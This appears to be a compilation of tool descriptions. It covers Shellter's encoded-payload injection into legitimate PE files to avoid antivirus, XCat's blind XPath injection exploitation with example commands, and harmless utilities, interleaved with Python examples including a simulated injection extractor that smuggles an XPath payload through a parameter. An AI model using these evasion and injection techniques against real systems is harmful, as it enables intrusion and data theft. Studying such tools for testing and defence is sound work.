The best bet is to use completely legitimate looking applications (ideally not packed) that are not flagged by any AV vendor for any reason.

These can be either yours, or something you got online.

Can I use encoded/self-decrypting payloads?

Shellter also supports encoded/self-decrypting payloads by taking advantage of the Imports Table of the application. It looks for specific imported APIs that can be used at runtime to execute a self-decrypting payload without modifying the section characteristics in the PE header.

At the moment 7 methods are supported for loading encoded payloads:
  •     VirtualAlloc
  •     VirtualAllocEx
  •     VirtualProtect
  •     VirtualProtectEx
  •     HeapCreate/HeapAlloc
  •     LoadLibrary/GetProcAddress
  •     CreateFileMapping/MapViewOfFile

If the target PE file doesn’t import the necessary API(s) by default, the method will be shown as ‘N/A’.
If a method requires more than one API (for example the HeapCreate/HeapAlloc method), it will also be shown as ‘N/A’ if the PE file doesn’t import all of them.

If none of the encoded payload handler methods supported are available for the current PE target, you can choose to either select a non-encoded payload or to change the section’s characteristics from inside the PE Header.

This last option has been added in order to provide more flexibility to the user in case he still wants to use a specific encoded payload along with the same PE file.
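A check for the ‘N/A’ rule described above, as an added example rather than Shellter's code: walk the import directory of a PE32/PE32+ file and report which of the seven handler methods the file's imports can support, where a method needing several APIs is available only if all of them are imported. Treating the A/W suffix as irrelevant (LoadLibraryA counts as LoadLibrary) is an assumption, and build_test_pe() constructs a minimal fixture PE so the parser can be exercised without a real binary.

```python
import re
import struct

# Handler methods listed on the page, keyed to the imports each one needs.
# Assumption: an A/W suffix is ignored (LoadLibraryA counts as LoadLibrary).
METHODS = {
    "VirtualAlloc": ("VirtualAlloc",),
    "VirtualAllocEx": ("VirtualAllocEx",),
    "VirtualProtect": ("VirtualProtect",),
    "VirtualProtectEx": ("VirtualProtectEx",),
    "HeapCreate/HeapAlloc": ("HeapCreate", "HeapAlloc"),
    "LoadLibrary/GetProcAddress": ("LoadLibrary", "GetProcAddress"),
    "CreateFileMapping/MapViewOfFile": ("CreateFileMapping", "MapViewOfFile"),
}


def _cstr(data: bytes, off: int) -> str:
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def _rva_to_off(sections, rva: int) -> int:
    for va, raw_ptr, raw_size in sections:
        if va <= rva < va + raw_size:
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} outside every section")


def parse_imports(data: bytes) -> dict:
    """Walk the import directory of a PE32/PE32+ image: {dll: [api, ...]}."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    plus = struct.unpack_from("<H", data, opt)[0] == 0x20B            # PE32+?
    imp_rva = struct.unpack_from("<I", data, opt + (0x78 if plus else 0x68))[0]
    sections = []
    for i in range(nsec):
        va, raw_size, raw_ptr = struct.unpack_from("<III", data, opt + opt_size + i * 40 + 12)
        sections.append((va, raw_ptr, raw_size))
    imports = {}
    if imp_rva == 0:
        return imports
    fmt, size, ord_flag = ("<Q", 8, 1 << 63) if plus else ("<I", 4, 1 << 31)
    desc = _rva_to_off(sections, imp_rva)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, desc)
        if name_rva == 0:                          # all-zero descriptor ends the table
            break
        thunk = _rva_to_off(sections, oft or ft)
        names = []
        while (v := struct.unpack_from(fmt, data, thunk)[0]) != 0:
            names.append(f"#{v & 0xFFFF}" if v & ord_flag
                         else _cstr(data, _rva_to_off(sections, v) + 2))   # skip hint
            thunk += size
        imports[_cstr(data, _rva_to_off(sections, name_rva)).lower()] = names
        desc += 20
    return imports


def handler_methods(imports: dict) -> dict:
    """'available' or 'N/A' per method: every API it needs must be imported."""
    have = {re.sub(r"[AW]$", "", n) for names in imports.values() for n in names}
    return {m: "available" if all(a in have for a in apis) else "N/A"
            for m, apis in METHODS.items()}


def build_test_pe(dll: str, names) -> bytes:
    """Constructed fixture: a minimal PE32 whose only content is an import
    directory for `dll`. It parses, but it is not a runnable executable."""
    sec_rva, sec_off, thunk_off = 0x1000, 0x200, 40          # two 20-byte descriptors
    thunks, entries = bytearray(), bytearray()
    names_off = thunk_off + 4 * (len(names) + 1)
    dll_bytes = dll.encode() + b"\0"
    hint_off = names_off + len(dll_bytes)
    for nm in names:
        thunks += struct.pack("<I", sec_rva + hint_off + len(entries))
        entries += b"\0\0" + nm.encode() + b"\0"               # hint + name
    thunks += b"\0\0\0\0"
    blob = struct.pack("<IIIII", sec_rva + thunk_off, 0, 0, sec_rva + names_off, sec_rva + thunk_off)
    blob += bytes(20) + thunks + dll_bytes + entries
    hdr = bytearray(sec_off)
    hdr[:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 224, 0x102)
    struct.pack_into("<H", hdr, 0x58, 0x10B)                                  # PE32 magic
    struct.pack_into("<II", hdr, 0x58 + 0x68, sec_rva, 40)                    # import dir
    struct.pack_into("<8sIIII", hdr, 0x58 + 224, b".idata", len(blob), sec_rva, len(blob), sec_off)
    return bytes(hdr) + blob


if __name__ == "__main__":
    sample = build_test_pe("kernel32.dll", ["VirtualAlloc", "HeapCreate", "LoadLibraryA", "GetProcAddress"])
    for method, state in handler_methods(parse_imports(sample)).items():
        print(f"{method:32} {state}")
```

Point parse_imports() at the bytes of a real candidate template to see the same table for it; imports by ordinal are reported as #N and never satisfy a method.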


NTFSLinksView - View NTFS symbolic links and junction points


Starting from Windows Vista, Microsoft uses symbolic links and junction points of NTFS file system in order to make changes in the folders structure of Windows and keep the compatibility of applications written for older versions of Windows. This utility simply shows you a list of all symbolic links and junctions in the specified folder, and their target paths. It also allows you to save the symbolic links/junctions list into text/html/xml/csv file.
Using NTFSLinksView 

NTFSLinksView doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file, NTFSLinksView.exe. When you run NTFSLinksView, press the Go button and the main window will display the list of all NTFS symbolic links/junction points in your profile folder. If you want to view the NTFS links in other folders, simply type the folder path in the top text box and press Enter (or click the 'Go' button).

If you want to scan your entire drive, type 'C:\' in the folder text box and choose Infinite subfolder depth.
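A scripted equivalent of that scan, as an added example that is not NirSoft's code: walk a folder without following links, report symbolic links and reparse points (junctions surface through FILE_ATTRIBUTE_REPARSE_POINT on Windows; on other systems only symlinks appear), honour a subfolder depth like the tool's option, and export CSV. The demo tree built by demo() is constructed in a temporary directory.

```python
import csv
import io
import os
import stat
import tempfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Attribute set on junctions and other reparse points (Windows-only constant).
REPARSE = getattr(stat, "FILE_ATTRIBUTE_REPARSE_POINT", 0x400)


@dataclass
class Link:
    path: str
    kind: str        # "symlink" or "junction/reparse"
    target: str


def _target(path: str) -> str:
    try:
        return os.readlink(path)      # symlinks everywhere; junctions on Windows (3.8+)
    except OSError:
        return "?"


def find_links(root: str, max_depth: Optional[int] = None) -> List[Link]:
    """List every symlink or reparse point under root. max_depth=None means
    infinite depth; 0 scans only root itself. Links are never followed, so a
    link pointing back up the tree cannot loop the walk."""
    found, stack = [], [(root, 0)]
    while stack:
        d, depth = stack.pop()
        try:
            entries = list(os.scandir(d))
        except OSError:
            continue
        for e in entries:
            attrs = getattr(e.stat(follow_symlinks=False), "st_file_attributes", 0)
            if e.is_symlink():
                found.append(Link(e.path, "symlink", _target(e.path)))
            elif attrs & REPARSE:
                found.append(Link(e.path, "junction/reparse", _target(e.path)))
            elif e.is_dir(follow_symlinks=False) and (max_depth is None or depth < max_depth):
                stack.append((e.path, depth + 1))
    return sorted(found, key=lambda l: l.path)


def to_csv(links: List[Link]) -> str:
    buf = io.StringIO()
    w = csv.writer(buf)
    w.writerow(["path", "kind", "target"])
    for l in links:
        w.writerow([l.path, l.kind, l.target])
    return buf.getvalue()


def demo() -> Tuple[int, int]:
    """Constructed tree: one symlink at the top, one two levels down.
    Returns (links found at infinite depth, links found at depth 0)."""
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "a", "b"))
        open(os.path.join(base, "real.txt"), "w").close()
        os.symlink(os.path.join(base, "real.txt"), os.path.join(base, "top.lnk"))
        os.symlink(os.path.join(base, "a"), os.path.join(base, "a", "b", "deep.lnk"))
        return len(find_links(base)), len(find_links(base, max_depth=0))


if __name__ == "__main__":
    print(to_csv(find_links(os.path.expanduser("~"), max_depth=2)))
```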


XCat - Tool that aids in the exploitation of blind XPath injection vulnerabilities

XCat is a command line program that aids in the exploitation of blind XPath injection vulnerabilities. It can be used to retrieve the whole XML document being processed by a vulnerable XPath query, read arbitrary files on the host's filesystem and utilize out-of-band HTTP requests to make the server send data directly to xcat.

XCat is built to exploit boolean XPath injections (where only one bit of data can be extracted per request). It requires you to identify the injection manually first; it does not do that for you.

Features
  • Exploits both GET and POST attacks
  • Extracts all nodes, comments, attributes and data from the entire XML document
  • Small and lightweight (only a few pure-python dependencies)
  • Parallel requests
  • XPath 2.0 supported (with graceful degrading to 1.0)
  • Advanced data postback through HTTP (see below)
  • Arbitrarily read XML files on the server's file system via the doc() function (see below)
  • Arbitrarily read text files on the server's file system via crafted SYSTEM entities

Examples
If you run a Windows machine you can install Jython and start the example application (example_application/ironpython_site.py). The syntax for a simple command you can execute against this server is:
xcat --method=GET http://localhost:8080 title=Foundation title "1 results found" run retrieve

This command specifies the HTTP method (GET), the target URL (our localhost server), the GET or POST data to send (title=Foundation), the vulnerable parameter (title) and a string that indicates a true response ("1 results found"). Executing this will retrieve the entire XML file being queried.
>> xcat --method=GET http://localhost:8080 title=Foundation title "1 results found" run retrieve
Injecting using FunctionCall
Detecting features...
Supported features: String to codepoints, XPath 2, Read local XML files, Substring search speedup
Retrieving /*[1]
<?xml version="1.0" encoding="utf-8"?>
<library>
<rentals>
<books>
<!-- A comment -->
<book>
...

The retrieval of documents can be sped up in a number of ways, such as using the doc() function to make the server send data directly to XCat (explained in more detail below). Each of these techniques is called a feature and can be viewed with the test_injection command. This displays information about the injection, including its type (integer, string, path name) and the features XCat is able to use. XCat knows which features are best and will gracefully degrade if they fail for any reason.
>> xcat --method=GET --public-ip="localhost" http://localhost:8080 title=Foundation title "1 results found" test_injection
Testing parameter title:
FunctionCallInjection: /lib/something[function(?)]
- EfficientSubstringSearch
- OOBDocFeature
- CodepointSearch
- XPath2
- DocFeature
- EntityInjection
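The one-bit-per-request loop that XCat automates, as an added example that is not part of XCat: a fake server stands in for the vulnerable endpoint (the title parameter is dropped unescaped into //book[title='...'] and the page answers only true or false), and the client recovers a string with a binary search on string-length() followed by a per-character binary search on string-to-codepoints(), which is the XPath 2 "CodepointSearch" idea; with xpath2=False it degrades to equality tests over an alphabet as XPath 1.0 forces. The document, the predicate shape and the small XPath subset the fake server evaluates are all constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed document standing in for the XML the vulnerable app queries.
SECRET_XML = ("<library><book><title>Foundation</title>"
              "<author>Isaac Asimov</author></book></library>")
ROOT = ET.fromstring(SECRET_XML)


class FakeServer:
    """Stand-in for the vulnerable endpoint: ?title=<value> lands unescaped in
    //book[title='<value>'] and the page says '1 results found' (True) only when
    the predicate holds. _cond() evaluates just the XPath subset the client
    below sends; it is a simulation, not an XPath engine."""

    def __init__(self):
        self.requests = 0

    def query(self, title_param: str) -> bool:
        self.requests += 1
        xpath = f"//book[title='{title_param}']"
        m = re.fullmatch(r"//book\[title='([^']*)' and (.*) and '1'='1'\]", xpath)
        if not m:                                     # no injection: plain lookup
            return any(b.findtext("title") == title_param for b in ROOT.iter("book"))
        hit = any(b.findtext("title") == m.group(1) for b in ROOT.iter("book"))
        return hit and self._cond(m.group(2))

    def _text(self, path: str) -> str:
        parts = path.strip("/").split("/")
        if parts[0] != ROOT.tag:
            return ""
        node = ROOT if len(parts) == 1 else ROOT.find("/".join(parts[1:]))
        return (node.text or "") if node is not None else ""

    def _cond(self, c: str) -> bool:
        if m := re.fullmatch(r"string-length\((.+)\)>(\d+)", c):
            return len(self._text(m.group(1))) > int(m.group(2))
        if m := re.fullmatch(r"string-to-codepoints\(substring\((.+),(\d+),1\)\)>(\d+)", c):
            s, i = self._text(m.group(1)), int(m.group(2))
            return i <= len(s) and ord(s[i - 1]) > int(m.group(3))
        if m := re.fullmatch(r"substring\((.+),(\d+),1\)='(.)'", c):
            s, i = self._text(m.group(1)), int(m.group(2))
            return i <= len(s) and s[i - 1] == m.group(3)
        raise ValueError("unsupported condition: " + c)


def oracle(server: FakeServer, cond: str) -> bool:
    """One boolean question, smuggled in through the title parameter."""
    return server.query(f"Foundation' and {cond} and '1'='1")


def bsearch(is_greater, lo: int, hi: int) -> int:
    """Pin down v in [lo, hi] using only answers to 'is v > mid?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if is_greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(server: FakeServer, path: str, xpath2: bool = True,
                   alphabet: str = "") -> str:
    """Recover the text at `path`. XPath 2 mode binary-searches codepoints
    (8 requests for the length, then 7 per character for ASCII); XPath 1.0
    mode falls back to equality tests over `alphabet`."""
    length = bsearch(lambda n: oracle(server, f"string-length({path})>{n}"), 0, 255)
    out = []
    for i in range(1, length + 1):
        if xpath2:
            cp = bsearch(lambda n: oracle(
                server, f"string-to-codepoints(substring({path},{i},1))>{n}"), 0, 127)
            out.append(chr(cp))
        else:
            out.append(next((ch for ch in alphabet
                             if oracle(server, f"substring({path},{i},1)='{ch}'")), "?"))
    return "".join(out)


if __name__ == "__main__":
    srv = FakeServer()
    print(extract_string(srv, "/library/book[1]/author"), "in", srv.requests, "requests")
```

The request counter is the number worth watching: it is why XCat probes for XPath 2 and the substring-search speedup first and only degrades to the slower 1.0 path when they fail.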


PWGen - Generator of cryptographically-strong passwords


PWGen is a professional password generator capable of creating large amounts of cryptographically-secure passwords or passphrases consisting of words from a word list. It uses a “random pool” technique to generate random data based on user inputs (keystrokes, mouse handling) and volatile system parameters. PWGen provides lots of options to customize passwords to the users’ various needs. Additionally, it offers strong text encryption and the creation of random data files (e.g., key files).

Notable Features
  • Free and Open-Source software
  • Unicode support
  • Unobtrusive: easy to use, doesn’t install any weird DLL files, doesn’t write to the Windows registry, doesn’t even write to your hard disk if you don’t want it, can be uninstalled easily
  • Uses up-to-date cryptography (AES, SHA-2) to generate random data for high-quality passwords
  • Numerous password options for various purposes
  • Generation of large amounts of passwords at once
  • Generation of passphrases composed of words from a word list
  • Pattern-based password generation (formatted passwords) provides nearly endless possibilities to customize passwords to the user’s needs
  • “Password hasher” functionality: Generate passwords based on a master password and a parameter string (e.g., the name of a website), similar to “Hashapass”
  • Secure text encryption
  • Multilingual support
  • In-depth manual (49 pages)
  • Runs on all Windows versions (32-bit and 64-bit; beginning with Windows 95 OEM Service Release 2)

SimpleProgramDebugger - Simple program debugger that shows all debug events


SimpleProgramDebugger is a simple debugging tool for Windows that attaches to an existing running program or starts a new program in debugging mode, and then displays all major debugging events that occur while the program is running, including Exception, Create Thread, Create Process, Exit Thread, Exit Process, Load DLL, Unload DLL, and Debug String.

After the debugging events are accumulated, you can easily export them into comma-delimited/tab-delimited/xml/html file or copy them to the clipboard and then paste them into Excel or any other spreadsheet application.

Start Using SimpleProgramDebugger

SimpleProgramDebugger doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file, SimpleProgramDebugger.exe. After running SimpleProgramDebugger, you can attach to a program that is already running by pressing F7 and choosing the desired process, or you can start a new program by pressing Ctrl+N and choosing the .exe file to run, optionally with parameters and a start folder.

After the debugging events are displayed in the main window of SimpleProgramDebugger, you can select one or more events, and then use the 'Save Selected items' option to export them into comma-delimited/tab-delimited/xml/html file or press Ctrl+C to copy them to the clipboard, and then paste them into Excel or any other spreadsheet application. 

